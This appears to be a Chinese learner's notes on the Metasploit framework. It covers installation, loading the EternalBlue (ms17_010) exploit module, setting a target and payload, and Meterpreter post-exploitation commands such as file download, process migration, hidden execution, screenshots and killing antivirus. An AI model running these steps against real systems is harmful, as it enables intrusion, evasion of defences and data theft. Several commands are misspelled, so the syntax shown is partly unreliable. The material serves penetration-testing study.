Metasploit学习笔记（一）

一．安装
Kali中自带

图形化

Windows平台下安装

下载之后一路下一步

设置环境变量
选择path
新建

开始菜单中输入msfconsole
或者用bat文件启动

二．基本用法
最基本组合：
搜索模块：search ms17-01
使用模块：use exploit/window/smb/ms17_010_eternalblue
配置相应信息：show options，set RHOST xxx.xxx.xxx
攻击载荷：set payload xxx/xxx/xxx（shellcode）
攻击：exploit
常用:
显示框架中可以使用的攻击模块:show exploit
辅助模块：show auxilinary
类似扫描器显示攻击载荷：show payload
服务枚举：nmap ip
关于Meterpreter：
命令选择项：help
隐藏到后台：background
查看会话：sesion -i 切换时：session ID
退出：quit
下载：download
获取目标主机正在运行进程的信息：ps
移植：migrate
在目标主机上执行文件：比如excute -H -f 则会隐藏cmd
终止指定进程：kill
获取目标系统信息：sysinfo
截屏：screenshot
关闭对方杀软：run killav